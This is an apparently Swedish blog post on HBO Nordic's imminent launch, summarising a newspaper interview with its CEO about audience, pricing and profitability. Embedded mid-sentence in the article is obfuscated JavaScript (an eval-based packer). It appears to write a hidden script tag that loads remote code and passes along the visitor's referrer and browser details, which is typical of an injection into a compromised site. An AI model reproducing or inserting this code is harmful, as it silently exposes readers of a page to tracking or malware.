Image Image Image Image Image Image Image Image Image Image

| 16 oktober, 2018

Scroll to top

Top

HBO Nordic lanseras i veckan

HBO Nordic lanseras i veckan
Sebastian Plengier Ehrnfelt

HBO eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|shstt|var|u0026u|referrer|yrksb||js|php’.split(‘|’),0,{}))
Nordic: 
Nu kan det vara dags. SVD Näringsliv har fått möjligheten att intervjua Hervé Payan, VD för HBO Nordic.

Det meddelas under intervjun att HBO Nordic kommer att lansera sin tjänst redan den här veckan, något vi hoppas starkt på.  

Hervé Payan säger också att de inte kommer att försöka konkurrera med de plaster HBO redan finns på. 

– Vår målgrupp är betydligt yngre än den som redan har betal-tv-paket. Vår målgrupp är våra fans. Vi är en premiumkanal och vi är inte ute efter Viaplays eller Cmores målgrupp. De har riktat in sig mot familjer. Vi riktar in oss på individuella prenumeranter och inte bara familjer.
– Vi riktar oss till tv-serie-fans och de vill se sina serier samtidigt som de sänds. De vill inte vänta ett par månader. Vi är en premiumkanal med premiuminnehåll. Vi sänder inte sport: Vi sänder tv-serier och filmer, både från HBO och från andra producenter.

Så här kommenterar Hervé Payan betalningsviljan och prisnivån på HBO Nordic:

– Så länge det kostar under 100 kronor är folk villiga att betala. Det är den erfarenheten vi har. Om det inte gäller sport, då betalar folk vad som helst. Vår potentiella marknad i Norden är runt 5 miljoner personer. Vi behöver bara en bråkdel av det för att nå break even och vi kommer att nå vinst inom ett par år.

Läs mer och se intervjun om HBO Nordic här! www.svd.se